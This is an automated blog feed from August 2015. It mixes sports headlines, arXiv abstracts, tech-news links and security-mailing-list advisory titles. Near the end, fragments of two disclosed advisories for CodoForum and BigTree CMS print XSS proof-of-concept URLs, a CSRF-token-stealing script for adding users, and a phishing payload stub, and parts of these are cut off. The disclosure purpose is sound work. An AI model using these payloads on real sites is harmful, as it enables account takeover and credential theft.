Saturday, August 15, 2015
anonymous
from Google Alert - anonymous http://ift.tt/1gLtcai
via IFTTT
Orioles Highlight: Chris Davis hits 2 HRs, the 2nd a walk-off, in 4-3 win over A's; Davis 34 HR, 15 since All-Star break (ESPN)
via IFTTT
Ravens: John Harbaugh uses political analogy when talking about training NFL officials, says "I'm going Trump here" (ESPN)
via IFTTT
Dortmund, Leicester earn impressive league victories
from FOX Sports Digital http://ift.tt/1DTBMim
via IFTTT
Casillas keeps clean sheet in debut win for Porto
from FOX Sports Digital http://ift.tt/1HOjhqn
via IFTTT
Zenit slips to defeat as CSKA tops Russian table
from FOX Sports Digital http://ift.tt/1HOjeed
via IFTTT
Mexico defender Moreno joins PSV from Espanyol
from FOX Sports Digital http://ift.tt/1DVYohX
via IFTTT
Orioles: OF Henry Urrutia recalled from Triple-A (.292, 10 HR, 50 RBI in 107 games); OF Junior Lake optioned to Triple-A (ESPN)
via IFTTT
Stoke scores 2 late goals, salvages 2-2 draw at Spurs
from FOX Sports Digital http://ift.tt/1IRuevb
via IFTTT
Saint-Etienne concedes late goal in 1-1 draw vs. Bordeaux
from FOX Sports Digital http://ift.tt/1TGvYQf
via IFTTT
Promoted Norwich beats Sunderland 3-1 in Premier League
from FOX Sports Digital http://ift.tt/1TGfMhH
via IFTTT
Surprising Leicester earns 2nd straight Premier League win
from FOX Sports Digital http://ift.tt/1TGfM1m
via IFTTT
Schalke begins Bundesliga with 3-0 win at Werder Bremen
from FOX Sports Digital http://ift.tt/1IRqObI
via IFTTT
Spurs sign Njie to bolster striker options
from FOX Sports Digital http://ift.tt/1IQTcee
via IFTTT
Orioles Highlight: Manny Machado hits walk-off 2-run HR in 13th in 8-6 win over A's; Adam Jones 3-run HR, Chris Davis HR (ESPN)
via IFTTT
Comet Dust over Enchanted Rock
Friday, August 14, 2015
The Merry Andrew by Anonymous
from Google Alert - anonymous http://ift.tt/1IPuXwN
via IFTTT
[FD] ERPSCAN Research Advisory [ERPSCAN-15-012] SAP Afaria 7 XComms – Buffer Overflow
Source: Gmail -> IFTTT-> Blogger
Bilbao routs Barcelona 4-0 in 1st leg of Spanish Super Cup
from FOX Sports Digital http://ift.tt/1IRyx7A
via IFTTT
Bayern kicks off season with 5-0 win over Hamburg
from FOX Sports Digital http://ift.tt/1hCWDfv
via IFTTT
Monaco held to goalless draw by Lille in French league
from FOX Sports Digital http://ift.tt/1N8dtzS
via IFTTT
FIFA bribery suspect agrees his extradition to Nicaragua
from FOX Sports Digital http://ift.tt/1Lcksrj
via IFTTT
Prosecutor seeks extradition of more FIFA defendants
from FOX Sports Digital http://ift.tt/1Lc8gqu
via IFTTT
Newcomer Buerki picked over veteran Weidenfeller in Dortmund
from FOX Sports Digital http://ift.tt/1JXbyfA
via IFTTT
Bundesliga newcomer Darmstadt signs defender Gyoergy Garics
from FOX Sports Digital http://ift.tt/1Wp9bXT
via IFTTT
Swiss players banned for cash to team that beat league rival
from FOX Sports Digital http://ift.tt/1J8kNJ2
via IFTTT
ISS Daily Summary Report – 08/13/15
from ISS On-Orbit Status Report http://ift.tt/1hC5z4Y
via IFTTT
Facebook Fired An Intern After He Exposes How to Track Users' Location
from The Hacker News http://ift.tt/1Kln8wN
via IFTTT
I have a new follower on Twitter
Upol Ehsan
Lead, #Research & Development ♦ Philosopher of Mind ♦ #Social #entrepreneur ♦ Futurist ♦ #InternetOfThngs and Open #innovation advocate ♦ @manUnited fan
http://t.co/YlAzioxwqX
Following: 2801 - Followers: 3389
August 14, 2015 at 08:03AM via Twitter http://twitter.com/UpolEhsan
French league relegation spots kept to 3 after court ruling
from FOX Sports Digital http://ift.tt/1ErmPPg
via IFTTT
Barcelona sends reserve player Adama Traore to Aston Villa
from FOX Sports Digital http://ift.tt/1ErghQG
via IFTTT
Ransomware Attacks Threaten Wearable Devices and Internet of Things
from The Hacker News http://ift.tt/1N72Tcg
via IFTTT
Leipzig given 2-0 German Cup win after lighter hits referee
from FOX Sports Digital http://ift.tt/1h9lM1s
via IFTTT
I have a new follower on Twitter
Max Foundry
We build and develop the awesome WordPress Button Plugin http://t.co/jWWuwPeoJn, WordPress Gallery Platform http://t.co/0cH2HebgC2 and http://t.co/9opivbIdKU
Columbus & San Francisco
http://t.co/dEwhk3iuKQ
Following: 817 - Followers: 4458
August 14, 2015 at 05:45AM via Twitter http://twitter.com/maxfoundry
Windows 10 Doesn't Stop Spying You, Even After Disabling It's Creepy Features
from The Hacker News http://ift.tt/1TzF2q0
via IFTTT
I have a new follower on Twitter
RSIP Vision
We provide cutting-edge image processing & computer vision R&D. Follow us for pixel & nerd news. @dr_felicityp tweets.For more detail please check out our site!
Worldwide
http://t.co/TW6nYc7VYM
Following: 889 - Followers: 835
August 14, 2015 at 01:04AM via Twitter http://twitter.com/RSIPvision
Moonless Meteors and the Milky Way
Thursday, August 13, 2015
Ravens: QB Joe Flacco nearly perfect, rookie DL Carl Davis impresses in preseason opener, writes Jamison Hensley (ESPN)
via IFTTT
Offerte su Amazon (@legrandiofferte) favorited one of your Tweets!
Source: Gmail -> IFTTT-> Blogger
Overeaters Anonymous
from Google Alert - anonymous http://ift.tt/1faQCF6
via IFTTT
Multiple-Path Selection for new Highway Alignments using Discrete Algorithms. (arXiv:1508.03064v1 [cs.DS])
This paper addresses the problem of finding multiple near-optimal, spatially-dissimilar paths that can be considered as alternatives in the decision making process, for finding optimal corridors in which to construct a new road. We further consider combinations of techniques for reducing the costs associated with the computation and increasing the accuracy of the cost formulation. Numerical results for five algorithms to solve the dissimilar multipath problem show that a "bidirectional approach" yields the fastest running times and the most robust algorithm. Further modifications of the algorithms to reduce the running time were tested and it is shown that running time can be reduced by an average of 56 percent without compromising the quality of the results.
from cs.AI updates on arXiv.org http://ift.tt/1h8c5QW
via IFTTT
Generation of Multimedia Artifacts: An Extractive Summarization-based Approach. (arXiv:1508.03170v1 [cs.AI])
We explore methods for content selection and address the issue of coherence in the context of the generation of multimedia artifacts. We use audio and video to present two case studies: generation of film tributes, and lecture-driven science talks. For content selection, we use centrality-based and diversity-based summarization, along with topic analysis. To establish coherence, we use the emotional content of music, for film tributes, and ensure topic similarity between lectures and documentaries, for science talks. Composition techniques for the production of multimedia artifacts are addressed as a means of organizing content, in order to improve coherence. We discuss our results considering the above aspects.
from cs.AI updates on arXiv.org http://ift.tt/1hAv7PT
via IFTTT
Talking about the Moving Image: A Declarative Model for Image Schema Based Embodied Perception Grounding and Language Generation. (arXiv:1508.03276v1 [cs.AI])
We present a general theory and corresponding declarative model for the embodied grounding and natural language based analytical summarisation of dynamic visuo-spatial imagery. The declarative model ---encompassing spatio-linguistic abstractions, image schemas, and a spatio-temporal feature based language generator--- is modularly implemented within Constraint Logic Programming (CLP). The implemented model is such that primitives of the theory, e.g., pertaining to space and motion, image schemata, are available as first-class objects with `deep semantics' suited for inference and query. We demonstrate the model with select examples broadly motivated by areas such as film, design, geography, smart environments where analytical natural language based externalisations of the moving image are central from the viewpoint of human interaction, evidence-based qualitative analysis, and sensemaking.
Keywords: moving image, visual semantics and embodiment, visuo-spatial cognition and computation, cognitive vision, computational models of narrative, declarative spatial reasoning
from cs.AI updates on arXiv.org http://ift.tt/1L9LVac
via IFTTT
Joint Optimization of Masks and Deep Recurrent Neural Networks for Monaural Source Separation. (arXiv:1502.04149v3 [cs.SD] UPDATED)
Monaural source separation is important for many real world applications. It is challenging because, with only a single channel of information available, without any constraints, an infinite number of solutions are possible. In this paper, we explore joint optimization of masking functions and deep recurrent neural networks for monaural source separation tasks, including monaural speech separation, monaural singing voice separation, and speech denoising. The joint optimization of the deep recurrent neural networks with an extra masking layer enforces a reconstruction constraint. Moreover, we explore a discriminative criterion for training neural networks to further enhance the separation performance. We evaluate the proposed system on the TSP, MIR-1K, and TIMIT datasets for speech separation, singing voice separation, and speech denoising tasks, respectively. Our approaches achieve 2.30--4.98 dB SDR gain compared to NMF models in the speech separation task, 2.30--2.48 dB GNSDR gain and 4.32--5.42 dB GSIR gain compared to existing models in the singing voice separation task, and outperform NMF and DNN baselines in the speech denoising task.
from cs.AI updates on arXiv.org http://ift.tt/1BhZEJR
via IFTTT
[FD] [CVE-2015-5617]Enorth Webpublisher CMS SQL Injection from delete_pending_news.jsp cbNewsid
Source: Gmail -> IFTTT-> Blogger
[FD] BFS-SA-2015-002: OpenSSH PAM Privilege Separation Vulnerabilities
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-4 OS X Server v4.1.5
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-3 iOS 8.4.1
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006
Source: Gmail -> IFTTT-> Blogger
[FD] APPLE-SA-2015-08-13-1 Safari 8.0.8, Safari 7.1.8, and Safari 6.2.8
Source: Gmail -> IFTTT-> Blogger
Real Salt Lake signs forward Juan Manuel Martinez
from FOX Sports Digital http://ift.tt/1JfUNgU
via IFTTT
Max Foundry (@maxfoundry) favorited one of your Tweets!
Source: Gmail -> IFTTT-> Blogger
Change this Facebook Privacy Setting That Could Allow Hackers to Steal Your Identity
from The Hacker News http://ift.tt/1gEm9jE
via IFTTT
Is AA Right for You?
from Google Alert - anonymous http://ift.tt/1J2F52i
via IFTTT
Blatter urges European soccer to revive his '6 plus 5' rule
from FOX Sports Digital http://ift.tt/1IKQiYc
via IFTTT
2 clubs in top Czech league fined for anti-Islam posters
from FOX Sports Digital http://ift.tt/1J2sZpU
via IFTTT
Boring no more, Chelsea goes to City embroiled in doc row
from FOX Sports Digital http://ift.tt/1TxCRxU
via IFTTT
Augsburg signs Ghana defender Daniel Opare
from FOX Sports Digital http://ift.tt/1Wm1Eco
via IFTTT
ISS Daily Summary Report – 08/12/15
from ISS On-Orbit Status Report http://ift.tt/1IK36OB
via IFTTT
Bundesliga starts with Bayern Munich as big favorite
from FOX Sports Digital http://ift.tt/1h5mMDJ
via IFTTT
Marseille looking for new coach following Bielsa's departure
from FOX Sports Digital http://ift.tt/1P8MnWV
via IFTTT
Bayer Leverkusen signs Chile midfielder Charles Aranguiz
from FOX Sports Digital http://ift.tt/1Ncfc6v
via IFTTT
Lenovo Caught Using Rootkit to Secretly Install Unremovable Software
from The Hacker News http://ift.tt/1JVb89s
via IFTTT
[FD] Zend Framework <= 2.4.2 XML eXternal Entity Injection (XXE) on PHP FPM
Source: Gmail -> IFTTT-> Blogger
Milky Way and Exploding Meteor
Wednesday, August 12, 2015
Impact draw Whitecaps 2-2 in Canadian final opener
from FOX Sports Digital http://ift.tt/1L75vqf
via IFTTT
[FD] Update: Backdoor and RCE found in 8 TOTOLINK router models
Source: Gmail -> IFTTT-> Blogger
Learning to Hire Teams. (arXiv:1508.02823v1 [cs.AI])
Crowdsourcing and human computation has been employed in increasingly sophisticated projects that require the solution of a heterogeneous set of tasks. We explore the challenge of building or hiring an effective team, for performing tasks required for such projects on an ongoing basis, from an available pool of applicants or workers who have bid for the tasks. The recruiter needs to learn workers' skills and expertise by performing online tests and interviews, and would like to minimize the amount of budget or time spent in this process before committing to hiring the team. How can one optimally spend budget to learn the expertise of workers as part of recruiting a team? How can one exploit the similarities among tasks as well as underlying social ties or commonalities among the workers for faster learning? We tackle these decision-theoretic challenges by casting them as an instance of online learning for best action selection. We present algorithms with PAC bounds on the required budget to hire a near-optimal team with high confidence. Furthermore, we consider an embedding of the tasks and workers in an underlying graph that may arise from task similarities or social ties, and that can provide additional side-observations for faster learning. We then quantify the improvement in the bounds that we can achieve depending on the characteristic properties of this graph structure. We evaluate our methodology on simulated problem instances as well as on real-world crowdsourcing data collected from the oDesk platform. Our methodology and results present an interesting direction of research to tackle the challenges faced by a recruiter for contract-based crowdsourcing.
from cs.AI updates on arXiv.org http://ift.tt/1DOeZnD
via IFTTT
OOASP: Connecting Object-oriented and Logic Programming. (arXiv:1508.03032v1 [cs.AI])
Most contemporary software systems are implemented using an object-oriented approach. Modeling phases -- during which software engineers analyze requirements to the future system using some modeling language -- are an important part of the development process, since modeling errors are often hard to recognize and correct.
In this paper we present a framework which allows the integration of Answer Set Programming into the object-oriented software development process. OOASP supports reasoning about object-oriented software models and their instantiations. Preliminary results of the OOASP application in CSL Studio, which is a Siemens internal modeling environment for product configurators, show that it can be used as a lightweight approach to verify, create and transform instantiations of object models at runtime and to support the software development process during design and testing.
from cs.AI updates on arXiv.org http://ift.tt/1DOeZnB
via IFTTT
Trend Filtering on Graphs. (arXiv:1410.7690v4 [stat.ML] UPDATED)
We introduce a family of adaptive estimators on graphs, based on penalizing the $\ell_1$ norm of discrete graph differences. This generalizes the idea of trend filtering [Kim et al. (2009), Tibshirani (2014)], used for univariate nonparametric regression, to graphs. Analogous to the univariate case, graph trend filtering exhibits a level of local adaptivity unmatched by the usual $\ell_2$-based graph smoothers. It is also defined by a convex minimization problem that is readily solved (e.g., by fast ADMM or Newton algorithms). We demonstrate the merits of graph trend filtering through examples and theory.
from cs.AI updates on arXiv.org http://ift.tt/ZXUQsd
via IFTTT
Orioles Video: Baltimore no-hit by Hisashi Iwakuma of Mariners; first time team no-hit since 2007 (Clay Buchholz) (ESPN)
via IFTTT
Videos of racism in English soccer can be uploaded to app
from FOX Sports Digital http://ift.tt/1UDFgcI
via IFTTT
Mariners: Hisashi Iwakuma's no-hitter was the team's 5th in franchise history and 3rd in last 4 seasons (ESPN)
via IFTTT
Breaking: Mariners P Hisashi Iwakuma throws no-hitter against Orioles; 7 K, 116 pitches in first career complete game (ESPN)
via IFTTT
Mariners P Hisashi Iwakuma has no-hitter in 9th inning vs. Orioles; tune to SportsCenter on ESPN (ESPN)
via IFTTT
Breaking: Mariners P Hisashi Iwakuma has a no-hitter through 8 innings against the Orioles; 7 K, 107 pitches (ESPN)
via IFTTT
Hearts goes top of Scottish league as Celtic draws
from FOX Sports Digital http://ift.tt/1IHORK4
via IFTTT
I have a new follower on Twitter
Miles Anthony Smith
Husband/Father, #Ambivert, #SerialSpecialist, Digital Marketer & #Audiobook Author Why #Leadership Sucks & Becoming #Generation Flux http://t.co/FUkXa8Pxil
Green Bay, Wisconsin
http://t.co/NAXy3aaINK
Following: 3122 - Followers: 3995
August 12, 2015 at 05:53PM via Twitter http://twitter.com/Miles_Anthony
MLB: Mariners P Hisashi Iwakuma has a no-hitter through 7 innings against the Orioles; 6 K, 90 pitches (ESPN)
via IFTTT
Measuring the Longitudinal Evolution of the Online Anonymous Marketplace Ecosystem
from Google Alert - anonymous http://ift.tt/1P7iXbG
via IFTTT
Anonymous Malaysia wants PM Najib Razak to resign, threatens cyber attack on Aug 29, AsiaOne ...
from Google Alert - anonymous http://ift.tt/1DNDJfR
via IFTTT
[FD] The OAuth2 Complete plugin for WordPress uses a pseudorandom number generator which is non-cryptographically secure (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Source: Gmail -> IFTTT-> Blogger
[FD] Open source tool for applying Google Chrome security updates
Source: Gmail -> IFTTT-> Blogger
Mariners: RF Nelson Cruz is not in Wednesday's lineup vs. Orioles after leaving Tuesday's game with neck spasms (ESPN)
via IFTTT
I have a new follower on Twitter
Traci Jones
The reports of my death have been greatly exaggerated.
Los Angeles
Following: 524 - Followers: 354
August 12, 2015 at 03:07PM via Twitter http://twitter.com/TraciJones79
Costa Rican national team coach Wanchope resigns following fight at game in Panama
from FOX Sports Digital http://ift.tt/1MkBtxW
via IFTTT
Mariano Nunez (@marianonunezdc) favorited one of your Tweets!
Source: Gmail -> IFTTT-> Blogger
Find a Meeting
from Google Alert - anonymous http://ift.tt/1L664AP
via IFTTT
I have a new follower on Twitter
Flow
Rapidly Design and Deploy Custom Cloud Based Data Automation Solutions.
https://t.co/HixZvF6akh
Following: 1157 - Followers: 769
August 12, 2015 at 12:35PM via Twitter http://twitter.com/flow_analytics
[FD] [Onapsis Security Advisory 2015-012] SAP Mobile Platform DataVault Predictable Encryption Password for Secure Storage
Source: Gmail -> IFTTT-> Blogger
[FD] [Onapsis Security Advisory 2015-010] SAP Mobile Platform DataVault Keystream Recovery
Source: Gmail -> IFTTT-> Blogger
[FD] [Onapsis Security Advisory 2015-011] SAP Mobile Platform DataVault Predictable encryption passwords for Configuration Values
Source: Gmail -> IFTTT-> Blogger
Messi, Suarez, Ronaldo in running for UEFA Best Player award
from FOX Sports Digital http://ift.tt/1WiHXSQ
via IFTTT
Costa Rica coach Wanchope in stadium fist fight
from FOX Sports Digital http://ift.tt/1IGrPn5
via IFTTT
ISS Daily Summary Report – 08/11/15
from ISS On-Orbit Status Report http://ift.tt/1L5FzLJ
via IFTTT
[FD] bizidea Design CMS 2015Q3 - SQL Injection Vulnerability
Source: Gmail -> IFTTT-> Blogger
Czech captain Tomas Rosicky could miss Euro 2016 qualifiers
from FOX Sports Digital http://ift.tt/1HG2vcJ
via IFTTT
Soccer player treated for cancer wins case over stopped pay
from FOX Sports Digital http://ift.tt/1L5sZMG
via IFTTT
Footballer treated for cancer wins case over stopped pay
from FOX Sports Digital http://ift.tt/1MjCl5W
via IFTTT
I have a new follower on Twitter
Zach Alfaro
Online marketers have very busy lives. I'll help you lead a more productive, successful & happy lifestyle through science-backed research & psychological hacks
Australia
http://t.co/GJPRvVxGDX
Following: 3503 - Followers: 3424
August 12, 2015 at 05:47AM via Twitter http://twitter.com/Kaizen_Creative
Contact Us
from Google Alert - anonymous http://ift.tt/1L4YOlW
via IFTTT
Harald Nielsen, who scored 6 at 1960 Olympics, dies at 73
from FOX Sports Digital http://ift.tt/1WhX0MA
via IFTTT
ADO goalkeeper turns goal poacher with back heel vs PSV
from FOX Sports Digital http://ift.tt/1IYjB6D
via IFTTT
Download Free Windows 10 for the Internet of Things and Raspberry Pi 2
from The Hacker News http://ift.tt/1P61nF3
via IFTTT
I have a new follower on Twitter
Ted Clark
Data Guy #BigData #SQLServer #datablending #crossfit #crossfitkids @sonicxfitkids #seeyouatsonic http://t.co/54s59LdQOn
#seattle #wallingford
http://t.co/1OZlLz5z6O
Following: 3672 - Followers: 3738
August 12, 2015 at 05:01AM via Twitter http://twitter.com/tedclark
Susie (@henson40) retweeted your Tweet!
Source: Gmail -> IFTTT-> Blogger
Microsoft issues Security Patches for Windows 10 and Edge Browser
from The Hacker News http://ift.tt/1IFA5nh
via IFTTT
[FD] Stored XSS in iframe allows less privileged users to do almost anything an admin can (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] Reflected XSS in iframe allows unauthenticated users to do almost anything an admin can (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] Blind SQL Injection in WP Symposium allows unauthenticated attackers to access sensitive data (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] Stored XSS in Google Analytics by Yoast Premium allows privileged users to attack other users (WordPress plugin)
Source: Gmail -> IFTTT-> Blogger
[FD] CodoForum 3.3.1 Multiple SQL Injections
Source: Gmail -> IFTTT-> Blogger
[FD] CodoForum 3.3.1 Multiple Cross Site Scriptings
sys/Ext/hybridauth/install.php:346
if( isset( $item["callback"] ) && $item["callback"] ){
    $provider_callback_url = '' . $GLOBAL_HYBRID_AUTH_URL_BASE . '?hauth.done=' . $provider . '';
}

XSS 2, 3 & 4
The page that manages users does not encode user input before echoing it, and is thus open to XSS. The vulnerable parameters are "username", "role", as well as "status". As the function retrieving POST request parameters uses GET parameters as fallback, it is possible to exploit this issue via POST or GET request.
Sample POC:
http://localhost/codoforum/admin/index.php?page=users&username=">&role=2&status=99
http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2">&status=99
http://localhost/codoforum/admin/index.php?page=users&username=foo&role=2&status=9">
Code:
// admin/modules/users.php:261
$role = getPost('role', '0');
$smarty->assign('role_selected', (($role == '0') ? '2' : $role));
[...]
$filter_url.="&role=" . $role;
[...]
$status = getPost('status', 99);
$smarty->assign('status_selected', $status);
[...]
$filter_url.="&status=" . $status;
[...]
$username = getPost('username', "");
$smarty->assign('entered_username', $username);
[...]
$filter_url.="&username=" . $username;

XSS 5
The page that shows a list of users does not encode the "pno" argument, and is thus open to XSS.
Sample POC:
http://localhost/codoforum/admin/index.php?page=users&sort_order=DESC&pno=1">&sort_by=status
Code:
// admin/modules/users.php:326
$sort_url = "index.php?page=users&sort_order=" . $isor . $filter_url . '&pno=' . $_GET['pno']; //put inverted link only for table heading
$smarty->assign('sort_url', $sort_url);

XSS 6
The page that shows plugins does not properly encode the "plugin" argument, and is thus open to XSS.
Sample POC:
http://localhost/codoforum/admin/index.php?page=ploader&plugin=
Code:
// admin/modules/ploader.php:85
'.$_GET['plugin'].'

3. Proof of Concept Codes:
This proof of concept adds a new user by bypassing CSRF protection. In a similar way, the new user could be given admin rights. The script can be loaded from an external server by injecting as payload for the XSS vulnerabilities described above.
var csrfProtectedPage = 'http://localhost/codoforum/admin/index.php?page=users';
// get valid token for current request
var html = get(csrfProtectedPage);
document.body.innerHTML = html;
var form = document.getElementById('add_user_form');
var token = form.CSRF_token.value;
// build form with valid token
document.body.innerHTML += '
Source: Gmail -> IFTTT-> Blogger
[FD] BigTree CMS 4.2.3 Multiple Sql Injections
Source: Gmail -> IFTTT-> Blogger
[FD] BigTree CMS 4.2.3 Multiple Cross-Site-Scripting Vulnerabilities
core/admin/modules/pages/_properties.php:70
core/admin/layouts/default.php:153
/ "

XSS 4 (via GET)
The "id" value described in the previous section is additionally echoed inside script tags, opening it up to a further XSS injection. Limitations: forward slash cannot be used and single and double quotes are escaped.
Simple POC:
http://localhost/BigTree-CMS/site/index.php/admin/pages/view-tree/xsstest", }});}});alert(1);$("%23pages_pages").sortable({ axis: "y", containment: "parent", handle: ".icon_sort", items: "li", placeholder: "ui-sortable-placeholder", tolerance: "pointer", update: function() {$.ajax("", { type: "POST", data: { id: "
Code:
core/admin/modules/pages/_nav-tree.php:138

3. Proof of Concept Codes:
3.1 Example Phishing Site:
The attack can for example be used for phishing, by displaying the login page and sending the data submitted by the victim to an attacker controlled server.
var payload = document.createElement('div');
payload.innerHTML = " ";
document.replaceChild(payload, document.documentElement);

4. Solution
To mitigate this issue please upgrade at least to version 4.2.3: http://ift.tt/1h1JZH1
Please note that a newer version might already be available.

5. Report Timeline
07/07/2015 Informed Vendor about Issue
07/08/2015 Vendor sent Fixes for confirmation
07/10/2015 Fixes Confirmed
07/26/2015 Vendor releases Version 4.2.3
08/07/2015 Disclosed to public
Source: Gmail -> IFTTT-> Blogger